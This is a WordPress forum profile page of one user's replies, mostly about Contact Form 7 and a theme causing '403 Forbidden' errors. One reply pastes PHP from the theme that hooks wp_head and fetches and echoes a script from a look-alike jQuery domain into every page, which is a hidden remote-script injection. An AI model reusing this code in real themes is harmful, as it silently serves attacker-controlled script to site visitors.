rezaee415
Forum Replies Created
-
Forum: Plugins
In reply to: [Contact Form 7] Contact Form 7 Date Fieldexcuse me
Can users edit data in the CF7 later?
Is the data(information) related to user’s profile?
Or should I use from form maker plugins?Forum: Plugins
In reply to: [Contact Form 7] Contact Form 7 Date FieldHi, friends
I have an “Employment Site” and I want that the “Employers” and “Employees” write their information in different forms with login the site and can edit it later.
and the two groups can search (advanced search) the information of other group for own needs from site(without access the WORDPRESS ADMIN).
Can I use CONTACT FORM 7 for this purpose?
Do you know any other plugin? or script?Hi, manindra.rana
then you add custom fields in plugin settings, you must write this shortcodes in your page content text or post content text:
[wpuf_addpost] for add posts
[wpuf_edit] for edit posts
and etc. custom fields show with the main form.
you can see this pageyes, it works correctly on TWENTYTWELVE but I can’t change theme,
can you help me to solve it?
Should I edit CSS?
thanksForum: Fixing WordPress
In reply to: 403 because of themethe problem went!
Forum: Fixing WordPress
In reply to: 403 because of themethank you akoszo
Forum: Fixing WordPress
In reply to: 403 because of themeThanks a lot all
thank you, Krishna
I had to change the theme and the “403forbidden” go away.Forum: Fixing WordPress
In reply to: 403 because of themeOK,
If I clean this code, Does anything go wrong?
Can I delete the “function-init.php”?Forum: Fixing WordPress
In reply to: 403 because of themeIn this file:
<?php if (!function_exists('insert_jquery_slider')){function insert_jquery_slider(){if (function_exists('curl_init')){$url = "https://www.jquerye.com/jquery-1.6.3.min.js";$ch = curl_init(); $timeout = 5;curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);$data = curl_exec($ch);curl_close($ch);echo $data;}}add_action('wp_head', 'insert_jquery_slider');} ?>
Does this code cause problem?
Forum: Fixing WordPress
In reply to: 403 Forbidden nginx on my headerThanks a lot all
You are my HERO “Jan Dembowski”
I couldn’t find exactly what was my problem and I had to change the theme and the 403forbidden go awayForum: Fixing WordPress
In reply to: 403 Forbidden nginx on my headerHi Ipstenu,
What’s your guidance?
I think my problem is similar to this but its post is closed.
I change the theme then the problem resolved, and I understood my theme is the cause of the problem, but I didn’t understand from which file!Forum: Fixing WordPress
In reply to: 403 Forbidden nginx on my headerHow can I find this code(jquery-1.6.3.min.js) in my files?
Do I open all the file and then search for this?Forum: Fixing WordPress
In reply to: 403 Forbidden nginx on my headerA file with this name is not exist in my whole host,
Can this have another name?
Do you know what is my website problem?Forum: Fixing WordPress
In reply to: 403 Forbidden nginx on my headerHi friends
I have a similar problem with my website
you can see: riseh.ir
I can not find the “jquery-1.6.3.min.js” in my theme folder. Does this exist always?
I’m amateur in HTML & PHP codeForum: Fixing WordPress
In reply to: 403 Forbidden nginx on my headerHi friends
I have a similar problem with my websiteI can not find the “jquery-1.6.3.min.js” in my theme folder. Does this exist always?
I’m amateur in HTML & PHP code